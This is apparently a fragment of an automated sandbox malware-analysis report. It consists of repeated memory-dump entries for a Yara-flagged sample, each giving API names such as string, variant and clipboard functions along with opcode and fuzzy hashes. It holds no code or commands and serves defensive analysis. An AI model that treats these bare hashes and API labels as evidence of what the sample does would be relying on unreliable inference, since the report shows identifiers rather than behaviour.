                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                        • Instruction ID: d21f5b58ae0ba17f6cb4a3acabd4656e9c34883fb092ee65c9d4e7554020fcee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9B092B1C02D10CBA4513F202C068ABB6242D13300F042030F90626203BE3BD23A449F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                        • Instruction ID: 1bc976e3a70217ef11a6f79418df115add6e25482d4789ce6ae3d5f6b232851b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95B012E0C04A00C7E8009F205C05832A23C5607210F003420E008E7103E535D010410E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                                                                                                                                                                        • Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                                                                                                                                                                                                                                        • Instruction ID: 5f90c8482877ae364e78efe8602c82ba5110085f469652caa7ae2d3bb2038f17
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC900224D4D1008681508F449440470E279930B111F103410900CF3062C310D545455D
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                        • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                        • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                        • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                        • Instruction ID: 1939b7a8fba86f3565492a73a80cd61ad407d2377537137f482ac654ffcda435
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC81076010CBD289D322C63C881875FBFD15BE7224F184B9DE1F54B3E6D6A98146C767
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                        • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                        • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                        • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                        • Instruction ID: deba820a8e52b2a3ab35dae12ee35c8ee25e556c86142ae19017fb6a2405e1a8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E81E66010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                        • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                        • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                        • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                        • Instruction ID: 3fe4beb551b1561cc2df33abfbabd8d7fec8b834b37441dd9191abd785b28721
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27410821108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51ACBA6
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                        • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                        • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                        • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                        • Instruction ID: 0d1e284cd805e27ed81b3ec7f669a5b692c4f78f973608501620b47ad6833ca2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1410820108BC1CED726CF3C8498616BFA16B66224F088ADDD8E54F3DBC375D519CB66
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                        • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                        • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                        • Opcode ID: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                                                                                                                                                                                                                                        • Instruction ID: a9953b1bb8accc57858ad58fbfb04de7fca8ead05279759b8301ea03ef7cd93a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F341097010C7C18AD365DB28849878FBFE16B96314F885A9CE6E94B3E2C7798405C757
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                        • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                        • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                        • Opcode ID: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                                                                                                                                                                                                                                        • Instruction ID: 029e264ef9d4e3b50156cd19f449ac87f1a0d12e61a7ba0474ddd7f641437e21
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A411C7000CBC18AD3A59B28849874FBFE06B93314F885A9CF5E94B3E2C7798445C753
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                        • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                                                                                                                                        • API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                        • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                        • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                        • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                                                                                                                                        • API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                        • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                        • Instruction ID: c70e84066231192c3a80ef3349435c03f0d51fdefbba0dd744884be25d9c0b73
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D41383160C7C18ED331CB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                                                        • Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                        • Instruction ID: b76372e09cc73909406717dc3fbe71efb48cf9fa1c2455e34ea6e3a10ef095fa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4151E3F1D08A929FD740AB78C4493AEBFA0AB42310F048638D99697392D37D995587E3